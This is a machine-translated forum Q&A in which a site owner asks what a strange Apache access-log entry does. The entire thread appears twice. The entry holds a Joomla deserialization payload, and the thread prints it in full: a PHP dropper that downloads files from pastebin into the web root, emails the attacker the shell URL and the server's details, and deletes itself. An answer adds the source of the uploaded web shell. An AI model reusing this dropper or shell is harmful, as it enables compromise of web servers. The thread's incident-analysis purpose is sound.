MySQL 注入尝试 - 如何从 access.log 复制?
MySQL Injection Attempt - How to replicate from access.log?
我最近一直致力于在我的生产 Apache/PHP/MySQL 网络应用程序中防止 SQL 注入。
为此,我经常浏览 Apache 访问日志以查找异常请求,如果发现异常请求,偶尔会尝试复制它们(有人有更好的推荐吗?)。
今天,我看到访问日志中出现了一条奇怪的日志。我看到存在 HTTP 引荐来源网址,但我没有原始请求的匹配日志。 Apache 错误日志中也没有匹配的日志表明它是 "denied by server configuration".
这是奇怪的日志(base_64解码):
169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" "}__test|O:21:\ "JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"[=54=][=54=][=54=]disconnectHandlers\";a :1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] 。 "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('
<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);
@unlink(__FILE__);
?>
'));
fclose($fp);
JFactory::getConfig();退出\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s :11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\" =55=]\";b:1;}\xf0\xfd\xfd\xfd"
我试图通过 Postman 复制此 GET 请求,但它被视为 "an invalid XMLHTTPRequest"。我不确定通常如何测试它?
我也不确定这是做什么(或试图做什么)。非常感谢information/theories关于此尝试做什么(如果它可能已经成功)。
我推测这只是通过 HTTP 引荐来源网址将 SQL 注入某些 "framework" 的简单尝试,但我不是专家。在此先感谢您的帮助。
这是我解码得到的
<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
看起来您正在使用 Joomla CMS。库文件夹 lol.php 中有一个文件正在被脚本调用。另一个文件 /libraries/joomla/wl.php 也是被调用的恶意文件。也正在执行 pastebin 代码
<?php
// name of the file is: i (it has no extension)
error_reporting(0);
if(isset($_GET["0"]))
{
echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';
echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";
?>
它正在将 pastebin 代码写入您的文件 /libraries/joomla/jmail.php.
结论:
如果您不使用 Joomla CMS,则无需担心。如果是,那么您需要检查那些受影响的文件。可能的恶意文件已上传到您的服务器。
我最近一直致力于在我的生产 Apache/PHP/MySQL 网络应用程序中防止 SQL 注入。
为此,我经常浏览 Apache 访问日志以查找异常请求,如果发现异常请求,偶尔会尝试复制它们(有人有更好的推荐吗?)。
今天,我看到访问日志中出现了一条奇怪的日志。我看到存在 HTTP 引荐来源网址,但我没有原始请求的匹配日志。 Apache 错误日志中也没有匹配的日志表明它是 "denied by server configuration".
这是奇怪的日志(base_64解码):
169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" "}__test|O:21:\ "JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"[=54=][=54=][=54=]disconnectHandlers\";a :1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] 。 "/libraries/lol.php" ; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('
<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);
@unlink(__FILE__);
?>
')); fclose($fp); JFactory::getConfig();退出\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s :11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\" =55=]\";b:1;}\xf0\xfd\xfd\xfd"
我试图通过 Postman 复制此 GET 请求,但它被视为 "an invalid XMLHTTPRequest"。我不确定通常如何测试它?
我也不确定这是做什么(或试图做什么)。非常感谢information/theories关于此尝试做什么(如果它可能已经成功)。
我推测这只是通过 HTTP 引荐来源网址将 SQL 注入某些 "framework" 的简单尝试,但我不是专家。在此先感谢您的帮助。
这是我解码得到的
<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
看起来您正在使用 Joomla CMS。库文件夹 lol.php 中有一个文件正在被脚本调用。另一个文件 /libraries/joomla/wl.php 也是被调用的恶意文件。也正在执行 pastebin 代码
<?php
// name of the file is: i (it has no extension)
error_reporting(0);
if(isset($_GET["0"]))
{
echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';
echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";
?>
它正在将 pastebin 代码写入您的文件 /libraries/joomla/jmail.php.
结论:
如果您不使用 Joomla CMS,则无需担心。如果是,那么您需要检查那些受影响的文件。可能的恶意文件已上传到您的服务器。